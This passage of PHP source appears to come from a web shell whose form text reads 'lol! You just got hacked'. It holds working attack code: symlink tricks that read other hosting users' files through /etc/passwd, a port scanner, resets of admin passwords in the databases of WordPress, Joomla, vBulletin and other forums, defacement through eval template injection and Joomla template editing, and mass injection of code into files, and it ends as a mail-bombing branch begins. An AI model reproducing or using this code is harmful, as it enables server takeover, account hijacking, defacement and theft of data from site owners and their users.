1465 else $file="";
1466
1467 if(empty($file))
1468 exit;
1469
1470 if(!is_writable("."))
1471 echo "not writable directory";
1472
1473 $level=0;
1474
1475 for($as=0;$as<$fakedep;$as++)
1476 {
1477 if(!file_exists($fakedir))
1478 mkdir($fakedir);
1479 chdir($fakedir);
1480 }
1481
1482 while(1<$as--) chdir("..");
1483
1484 $hardstyle = explode("/", $file);
1485
1486 for($a=0;$a<count($hardstyle);$a++)
1487 {
1488 if(!empty($hardstyle[$a]))
1489 {
1490 if(!file_exists($hardstyle[$a]))
1491 mkdir($hardstyle[$a]);
1492 chdir($hardstyle[$a]);
1493 $as++;
1494 }
1495 }
1496 $as++;
1497 while($as--)
1498 chdir("..");
1499
1500 @rmdir("fakesymlink");
1501 @unlink("fakesymlink");
1502
1503 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1504
1505 while(1)
1506 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1507 else $num++;
1508
1509 @unlink("fakesymlink");
1510 mkdir("fakesymlink");
1511
1512 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1513 }
1514 else
1515 echo '<CENTER>Cannot Create Symlink</CENTER>';
1516}
1517else if(isset($_REQUEST['404new']))
1518{
1519 ?>
1520 <form>
1521 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1522 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1523 </br>
1524 </form>
1525 <?php
1526}
1527else if(isset($_REQUEST['404page']))
1528{
1529 $url = $_SERVER['REQUEST_URI'];
1530 $path=explode('/',$url);
1531 $url =str_replace($path[count($path)-1],'',$url);
1532 if(isset($_POST['message']))
1533 {
1534 if($myfile = fopen(".htaccess", "a"))
1535 {
1536 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1537 if($myfilee = fopen("404.html", "w+"))
1538 {
1539 fwrite($myfilee, $_POST['message']);
1540 }
1541 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1542 }
1543 else
1544 echo "<center>Cannot Set 404 Page</center>";
1545 }
1546 else if(strlen($ind) != 0)
1547 {
1548 if($myfile = fopen(".htaccess", "a"))
1549 {
1550 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1551
1552 if($myfilee = fopen("404.html", "w+"))
1553 {
1554 fwrite($myfilee, base64_decode($ind));
1555
1556 fclose($myfilee);
1557 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1558 }
1559 fclose($myfile);
1560 }
1561 else
1562 {
1563 echo "<center>Cannot Set 404 Page</center>";
1564 }
1565 }
1566 else
1567 echo "<center>Nothing Specified in the shell</center>";
1568}
1569else if(isset($_GET["domains"]))
1570{
1571 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1572}
1573else if(isset($_GET["symlink"]))
1574{
1575 $d0mains = @file("/etc/named.conf");
1576 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1577 $path=explode('/',$url);
1578 $url =str_replace($path[count($path)-1],'',$url);
1579 if($d0mains)
1580 {
1581 @mkdir("dhanush",0777);
1582 @chdir("dhanush");
1583 execmd("ln -s / root");
1584 $file3 = 'Options all
1585 DirectoryIndex Sux.html
1586 AddType text/plain .php
1587 AddHandler server-parsed .php
1588 AddType text/plain .html
1589 AddHandler txt .html
1590 Require None
1591 Satisfy Any
1592 ';
1593 $fp3 = fopen('.htaccess','w');
1594 $fw3 = fwrite($fp3,$file3);
1595 @fclose($fp3);
1596 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1597
1598 $dcount = 1;
1599 foreach($d0mains as $d0main)
1600 {
1601 if(eregi("zone",$d0main))
1602 {
1603 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1604 flush();
1605
1606 if(strlen(trim($domains[1][0])) > 2)
1607 {
1608 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1609
1610 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1611 $dcount++;
1612 }
1613 }
1614
1615 }
1616 echo "</table>";
1617 }
1618 else
1619 {
1620 if(stristr(php_uname(),"Linux"))
1621 {
1622 ?>
1623 <div style="float:left;position:fixed;">
1624 <form>
1625 <table cellpadding="9">
1626 <tr>
1627 <th colspan="2">Get User Name</th>
1628 </tr>
1629 <tr>
1630 <td>Enter Website Name :</td>
1631 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1632 </tr>
1633 <tr>
1634 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1635 </tr>
1636 <tr>
1637 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1638 </tr>
1639 </table>
1640 </form>
1641 </div>
1642 <?php
1643 $TEST=@file('/etc/passwd');
1644 if ($TEST)
1645 {
1646 @mkdir("dhanush",0777);
1647 @chdir("dhanush");
1648 execmd("ln -s / root");
1649 $file3 = 'Options all
1650 DirectoryIndex Sux.html
1651 AddType text/plain .php
1652 AddHandler server-parsed .php
1653 AddType text/plain .html
1654 AddHandler txt .html
1655 Require None
1656 Satisfy Any
1657 ';
1658 $fp3 = fopen('.htaccess','w');
1659 $fw3 = fwrite($fp3,$file3);
1660 @fclose($fp3);
1661
1662 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1663
1664 $dcount = 1;
1665 $file = fopen("/etc/passwd", "r");
1666 //Output a line of the file until the end is reached
1667 while(!feof($file))
1668 {
1669 $s = fgets($file);
1670 $matches = array();
1671 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1672 $matches = str_replace("home/","",$matches[1]);
1673 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1674 continue;
1675 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1676 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1677 $dcount++;
1678 }
1679 fclose($file);
1680
1681 echo "</table>";
1682 }
1683 else
1684 {
1685 @mkdir("dhanush",0777);
1686 @chdir("dhanush");
1687 execmd("ln -s / root");
1688 $file3 = 'Options all
1689 DirectoryIndex Sux.html
1690 AddType text/plain .php
1691 AddHandler server-parsed .php
1692 AddType text/plain .html
1693 AddHandler txt .html
1694 Require None
1695 Satisfy Any
1696 ';
1697 $fp3 = fopen('.htaccess','w');
1698 $fw3 = fwrite($fp3,$file3);
1699 @fclose($fp3);
1700
1701 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1702
1703 $temp = "";
1704 $val1 = 0;
1705 $val2 = 1000;
1706 for(;$val1 <= $val2;$val1++)
1707 {
1708 $uid = @posix_getpwuid($val1);
1709 if ($uid)
1710 $temp .= join(':',$uid)."\n";
1711 }
1712 echo '<br/>';
1713 $temp = trim($temp);
1714
1715 $file5 = fopen("test.txt","w");
1716 fputs($file5,$temp);
1717 fclose($file5);
1718
1719 $dcount = 1;
1720 $file = fopen("test.txt", "r");
1721 while(!feof($file))
1722 {
1723 $s = fgets($file);
1724 $matches = array();
1725 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1726 $matches = str_replace("home/","",$matches[1]);
1727 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1728 continue;
1729 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1730 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1731 $dcount++;
1732 }
1733 fclose($file);
1734 echo "</table>";
1735 unlink("test.txt");
1736 }
1737 }
1738 else
1739 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1740 }
1741}
1742else if(isset($_GET['host']) && isset($_GET['protocol']))
1743{
1744 echo "Open Ports: ";
1745 $host = $_GET['host'];
1746 $proto = $_GET['protocol'];
1747 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1748 for($current = 0; $current <= 23; $current++)
1749 {
1750 $currents = $myports[$current];
1751 $service = getservbyport($currents, $proto);
1752 // Try to connect to port
1753 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1754 // Show results
1755 if($result)
1756 echo "<font class=txt>$currents, </font>";
1757 }
1758}
1759else if(isset($_REQUEST['forumpass']))
1760{
1761 $localhost = $_GET['f1'];
1762 $database = $_GET['f2'];
1763 $username = $_GET['f3'];
1764 $password = $_GET['f4'];
1765 $prefix = $_GET['prefix'];
1766 $newpass = $_GET['newpass'];
1767 $uid = $_GET['uid'];
1768
1769 if($_GET['forums'] == "vb")
1770 {
1771 $newpass = $_GET['newipbpass'];
1772 $uid = $_GET['ipbuid'];
1773 $con = mysql_connect($localhost,$username,$password);
1774 $db = mysql_select_db($database,$con);
1775 $salt = "eghjghrtd";
1776 $newpassword = md5(md5($newpass) . $salt);
1777 if($prefix == "" || $prefix == null)
1778 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1779 else
1780 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1781 if($sql)
1782 {
1783 mysql_close($con);
1784 echo "<font class=txt>Password Changed Successfully</font>";
1785 }
1786 else
1787 echo "Cannot Change Password";
1788 }
1789 else if($_GET['forums'] == "mybb")
1790 {
1791 $newpass = $_GET['newipbpass'];
1792 $uid = $_GET['ipbuid'];
1793 $con = mysql_connect($localhost,$username,$password);
1794 $db = mysql_select_db($database,$con);
1795 $salt = "jeghj";
1796 $newpassword = md5(md5($salt).md5($newpass));
1797 if($prefix == "" || $prefix == null)
1798 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1799 else
1800 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1801 if($sql)
1802 {
1803 mysql_close($con);
1804 echo "<font class=txt>Password Changed Successfully</font>";
1805 }
1806 else
1807 echo "Cannot Change Password";
1808 }
1809 else if($_GET['forums'] == "smf")
1810 {
1811 $newpass = $_GET['newipbpass'];
1812 $uid = $_GET['ipbuid'];
1813 $con = mysql_connect($localhost,$username,$password);
1814 $db = mysql_select_db($database,$con);
1815
1816 if($prefix == "" || $prefix == null)
1817 {
1818 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1819 $row = mysql_fetch_array($result);
1820 $membername = $row['member_name'];
1821 $newpassword = sha1(strtolower($membername).$newpass);
1822 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1823 }
1824 else
1825
1826 {
1827 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1828 $row = mysql_fetch_array($result);
1829 $membername = $row['member_name'];
1830 $newpassword = sha1(strtolower($membername).$newpass);
1831 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1832 }
1833 if($sql)
1834 {
1835 mysql_close($con);
1836 echo "<font class=txt>Password Changed Successfully</font>";
1837 }
1838 else
1839 echo "Cannot Change Password";
1840 }
1841 else if($_GET['forums'] == "phpbb")
1842 {
1843 $newpass = $_POST['newipbpass'];
1844 $uid = $_POST['ipbuid'];
1845 $con = mysql_connect($localhost,$username,$password);
1846 $db = mysql_select_db($database,$con);
1847
1848 $newpassword = md5($newpass);
1849 if(empty($prefix) || $prefix == null)
1850 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1851 else
1852 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1853 if($sql)
1854 {
1855 mysql_close($con);
1856 echo "<font class=txt>Password Changed Successfully</font>";
1857 }
1858 else
1859 echo "Cannot Change Password";
1860 }
1861 else if($_GET['forums'] == "ipb")
1862 {
1863 $newpass = $_POST['newipbpass'];
1864 $uid = $_POST['ipbuid'];
1865 $con = mysql_connect($localhost,$username,$password);
1866 $db = mysql_select_db($database,$con);
1867 $salt = "eghj";
1868 $newpassword = md5(md5($salt).md5($newpass));
1869 if($prefix == "" || $prefix == null)
1870 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1871 else
1872 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1873 if($sql)
1874 {
1875 mysql_close($con);
1876 echo "<font class=txt>Password Changed Successfully</font>";
1877 }
1878 else
1879 echo "Cannot Change Password";
1880 }
1881 else if($_GET['forums'] == "wp")
1882 {
1883 $uname = $_GET['uname'];
1884 $con = mysql_connect($localhost,$username,$password);
1885 $db = mysql_select_db($database,$con);
1886
1887 $newpassword = md5($newpass);
1888 if($prefix == "" || $prefix == null)
1889 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1890 else
1891 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1892 if($sql)
1893 {
1894 mysql_close($con);
1895 echo "<font class=txt>Password Changed Successfully</font>";
1896 }
1897 else
1898 echo "Cannot Change Password";
1899 }
1900 else if($_GET['forums'] == "joomla")
1901 {
1902 $newjoomlapass = $_GET['newjoomlapass'];
1903 $joomlauname = $_GET['username'];
1904 $con = mysql_connect($localhost,$username,$password);
1905 $db = mysql_select_db($database,$con);
1906
1907 $newpassword = md5($newjoomlapass);
1908 if($prefix == "" || $prefix == null)
1909 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1910 else
1911 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1912 if($sql)
1913 {
1914 mysql_close($con);
1915 echo "<font class=txt>Password Changed Successfully</font>";
1916 }
1917 else
1918 echo "Cannot Change Password";
1919 }
1920}
1921else if(isset($_POST['forumdeface']))
1922{
1923 $localhost = $_POST['f1'];
1924 $database = $_POST['f2'];
1925 $username = $_POST['f3'];
1926 $password = $_POST['f4'];
1927 $index = $_POST['index'];
1928 $prefix = $_POST['tableprefix'];
1929
1930 if($_POST['forumdeface'] == "vb")
1931 {
1932 $con =@ mysql_connect($localhost,$username,$password);
1933 $db =@ mysql_select_db($database,$con);
1934 $index=str_replace('"','\\"',$index);
1935 $attack = "{\${eval(base64_decode(\'";
1936 $attack .= base64_encode("echo \"$index\";");
1937 $attack .= "\'))}}{\${exit()}}</textarea>";
1938 if($prefix == "" || $prefix == null)
1939 $query = "UPDATE template SET template = '$attack'";
1940 else
1941 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1942 $result =@ mysql_query($query,$con);
1943 if($result)
1944 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1945 else
1946 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1947 }
1948 else if($_POST['forumdeface'] == "mybb")
1949 {
1950 $con =@ mysql_connect($localhost,$username,$password);
1951 $db =@ mysql_select_db($database,$con);
1952 $attack = "{\${eval(base64_decode(\'";
1953 $attack .= base64_encode("echo \"$index\";");
1954 $attack .= "\'))}}{\${exit()}}</textarea>";
1955 $attack = str_replace('"',"\\'",$attack);
1956
1957 if($prefix == "" || $prefix == null)
1958 $query = "UPDATE mybb_templates SET template = '$attack'";
1959 else
1960 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1961 $result =@ mysql_query($query,$con);
1962 if($result)
1963 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1964 else
1965 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1966 }
1967 else if($_POST['forumdeface'] == "smf")
1968 {
1969 $head = $_POST['head'];
1970 $catid = $_POST['f5'];
1971
1972 $con =@ mysql_connect($localhost,$username,$password);
1973 $db =@ mysql_select_db($database,$con);
1974 if($prefix == "" || $prefix == null)
1975 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1976 else
1977 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1978 $result =@ mysql_query($query,$con);
1979 if($result)
1980 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1981 else
1982 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1983 }
1984 else if($_POST['forumdeface'] == "ipb")
1985 {
1986 $head = $_POST['head'];
1987 $catid = $_POST['f5'];
1988
1989 $IPB = "forums";
1990 $con =@ mysql_connect($localhost,$username,$password);
1991 $db =@ mysql_select_db($database,$con);
1992 if($prefix == "" || $prefix == null)
1993 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1994 else
1995 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1996 if($result)
1997 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1998 else
1999 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
2000 }
2001 else if($_POST['forumdeface'] == "wp")
2002 {
2003 $catid = $_POST['f5'];
2004 $head = $_POST['head'];
2005
2006 $con =@ mysql_connect($localhost,$username,$password);
2007 $db =@ mysql_select_db($database,$con);
2008 if($prefix == "" || $prefix == null)
2009 {
2010 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2011 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2012 else
2013 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2014 }
2015 else
2016 {
2017 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2018 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2019 else
2020 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2021
2022 }
2023 $result =@mysql_query($query,$con) or mysql_error();
2024 if($result)
2025 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2026 else
2027 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2028 }
2029 else if($_POST['forumdeface'] == "joomla")
2030 {
2031 $site_url = $_POST['siteurl'];
2032 $dbprefix = $_POST['tableprefix'];
2033 $dbname = $_POST['f2'];
2034 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2035
2036 function randomt()
2037 {
2038 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2039 srand((double)microtime()*1000000);
2040 $i = 0;
2041 $pass = '' ;
2042
2043 while ($i <= 7)
2044 {
2045 $num = rand() % 33;
2046 $tmp = substr($chars, $num, 1);
2047 $pass = $pass . $tmp;
2048 $i++;
2049 }
2050
2051 return $pass;
2052 }
2053 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2054 {
2055 $ar0=explode($marqueurDebutLien, $text);
2056 $ar1=explode($marqueurFinLien, $ar0[$i]);
2057 $ar=trim($ar1[0]);
2058 return $ar;
2059 }
2060 $co=randomt();
2061
2062 $link=mysql_connect($localhost,$username,$password) ;
2063 mysql_select_db($dbname,$link);
2064
2065 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2066
2067 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2068
2069 if ( $req )
2070 {
2071 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2072 $data = mysql_fetch_array($req);
2073 $template_name=$data["template"];
2074
2075 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2076 $data = mysql_fetch_array($req);
2077 $template_id=$data["extension_id"];
2078
2079 $url2=$site_url."/index.php";
2080
2081 $ch = curl_init();
2082 curl_setopt($ch, CURLOPT_URL, $url2);
2083 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2084 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2085 curl_setopt($ch, CURLOPT_HEADER, 1);
2086 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2087 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2088 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2089
2090
2091 $buffer = curl_exec($ch);
2092
2093 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2094 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2095
2096
2097 $url2=$site_url."/index.php";
2098 $ch = curl_init();
2099 curl_setopt($ch, CURLOPT_URL, $url2);
2100 curl_setopt($ch, CURLOPT_POST, 1);
2101 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2102 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2103 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2104 curl_setopt($ch, CURLOPT_HEADER, 0);
2105 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2106 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2107 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2108 $buffer = curl_exec($ch);
2109
2110 $pos = strpos($buffer,"com_config");
2111 if($pos === false)
2112 {
2113 echo("<br>[-] Login Error");
2114 exit;
2115 }
2116
2117 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2118 $ch = curl_init();
2119 curl_setopt($ch, CURLOPT_URL, $url2);
2120 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2121 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2122 curl_setopt($ch, CURLOPT_HEADER, 0);
2123 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2124 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2125
2126 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2127 $buffer = curl_exec($ch);
2128
2129 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2130 if(!$hidden2)
2131 {
2132 echo("<br>[-] index.php Not found in Theme Editor");
2133 exit;
2134 }
2135
2136 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2137
2138 $ch = curl_init();
2139 curl_setopt($ch, CURLOPT_URL, $url2);
2140 curl_setopt($ch, CURLOPT_POST, 1);
2141 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2142
2143 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2144 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2145 curl_setopt($ch, CURLOPT_HEADER, 0);
2146 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2147 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2148 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2149 $buffer = curl_exec($ch);
2150
2151 $pos = strpos($buffer,'<dd class="message message">');
2152 if($pos === false)
2153 {
2154 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2155 }
2156 else
2157 {
2158 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2159 }
2160 }
2161 else
2162 {
2163 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2164 $data = mysql_fetch_array($req);
2165 $template_name=$data["template"];
2166
2167 $url2=$site_url."/index.php";
2168 $ch = curl_init();
2169 curl_setopt($ch, CURLOPT_URL, $url2);
2170 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2171 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2172 curl_setopt($ch, CURLOPT_HEADER, 1);
2173 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2174 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2175 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2176 $buffer = curl_exec($ch);
2177
2178 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2179
2180 $url2=$site_url."/index.php";
2181 $ch = curl_init();
2182 curl_setopt($ch, CURLOPT_URL, $url2);
2183 curl_setopt($ch, CURLOPT_POST, 1);
2184 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2185 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2186 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2187 curl_setopt($ch, CURLOPT_HEADER, 0);
2188 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2189 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2190 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2191 $buffer = curl_exec($ch);
2192
2193 $pos = strpos($buffer,"com_config");
2194
2195 if($pos === false)
2196 {
2197 echo("<br>[-] Login Error");
2198 exit;
2199 }
2200
2201 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2202 $ch = curl_init();
2203 curl_setopt($ch, CURLOPT_URL, $url2);
2204 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2205 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2206 curl_setopt($ch, CURLOPT_HEADER, 0);
2207 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2208 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2209 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2210 $buffer = curl_exec($ch);
2211
2212 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2213
2214 if(!$hidden2)
2215 {
2216 echo("<br>[-] index.php Not found in Theme Editor");
2217 }
2218
2219 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2220 $ch = curl_init();
2221 curl_setopt($ch, CURLOPT_URL, $url2);
2222 curl_setopt($ch, CURLOPT_POST, 1);
2223 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2224 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2225 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2226 curl_setopt($ch, CURLOPT_HEADER, 0);
2227 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2228 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2229 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2230 $buffer = curl_exec($ch);
2231
2232 $pos = strpos($buffer,'<dd class="message message fade">');
2233 if($pos === false)
2234 {
2235 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2236 exit;
2237 }
2238 else
2239 {
2240 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2241 }
2242 }
2243 }
2244}
2245else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2246{
2247 $filetype = $_POST['filetype'];
2248
2249 $mode = "a";
2250
2251 if($_POST['mode'] == 'Apender')
2252 $mode = "a";
2253
2254 if($_POST['mode'] == 'Overwriter')
2255 $mode = "w";
2256
2257 if (is_dir($_POST['pathtomass']))
2258 {
2259 $lolinject = $_POST['injectthis'];
2260 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2261 if(substr($_POST['pathtomass'], -1) == "\\")
2262 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2263 foreach (glob($mypath) as $injectj00)
2264 {
2265 if($injectj00 == __FILE__)
2266 continue;
2267 $fp=fopen($injectj00,$mode);
2268 if (fputs($fp,$lolinject))
2269 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2270 else
2271 echo 'failed to inject '.$injectj00.'<br>';
2272 }
2273 }
2274 else
2275 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2276}
2277else if(isset($_POST['mailfunction']))
2278{
2279 if($_POST['mailfunction'] == "dobombing")
